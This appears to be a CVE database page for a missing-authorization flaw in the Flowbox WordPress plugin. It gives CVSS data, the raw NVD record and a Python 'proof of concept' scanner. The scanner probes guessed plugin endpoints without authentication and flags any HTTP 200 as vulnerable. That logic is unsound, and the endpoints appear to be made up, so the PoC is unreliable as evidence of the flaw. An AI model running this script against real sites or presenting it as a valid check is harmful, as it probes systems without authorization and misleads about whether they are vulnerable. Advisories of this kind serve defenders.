Security Vulnerability Report
中文
CVE-2025-49338 CVSS 5.3 MEDIUM

CVE-2025-49338

Published: 2025-12-31 16:15:43
Last Modified: 2026-04-23 15:31:30

Description

Missing Authorization vulnerability in Flowbox Flowbox flowbox allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Flowbox: from n/a through <= 1.1.6.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Flowbox WordPress插件 <= 1.1.6
Flowbox WordPress插件 < 1.1.7 (修复版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys def check_cve_2025_49338(target_url): """ PoC for CVE-2025-49338: Missing Authorization in Flowbox WordPress Plugin This PoC checks if the target is vulnerable by attempting to access a sensitive endpoint that should require authorization. """ # Vulnerable endpoints that may be accessible without authentication vulnerable_endpoints = [ f"{target_url}/wp-admin/admin-ajax.php", f"{target_url}/wp-json/flowbox/v1/", f"{target_url}/wp-content/plugins/flowbox/api/" ] print(f"[*] Checking target: {target_url}") print(f"[*] CVE-2025-49338: Flowbox Missing Authorization") print("="*60) for endpoint in vulnerable_endpoints: try: # Attempt to access without authentication response = requests.get(endpoint, timeout=10, verify=False) # Check if we get a successful response that should require auth if response.status_code == 200: print(f"[+] VULNERABLE: {endpoint}") print(f" Status: {response.status_code}") print(f" Response length: {len(response.text)} bytes") elif response.status_code == 401 or response.status_code == 403: print(f"[-] NOT VULNERABLE: {endpoint}") print(f" Status: {response.status_code} (Authorization Required)") else: print(f"[*] UNKNOWN: {endpoint}") print(f" Status: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[!] ERROR: {endpoint} - {str(e)}") print("="*60) print("[*] PoC completed. Manual verification recommended.") if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: python {sys.argv[0]} <target_url>") print(f"Example: python {sys.argv[0]} http://example.com") sys.exit(1) target_url = sys.argv[1].rstrip('/') check_cve_2025_49338(target_url)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-49338", "sourceIdentifier": "[email protected]", "published": "2025-12-31T16:15:43.093", "lastModified": "2026-04-23T15:31:29.727", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Flowbox Flowbox flowbox allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Flowbox: from n/a through <= 1.1.6."}, {"lang": "es", "value": "Vulnerabilidad de autorización faltante en Flowbox permite explotar niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a Flowbox: desde n/a hasta 1.1.5."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/flowbox/vulnerability/wordpress-flowbox-plugin-1-1-5-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}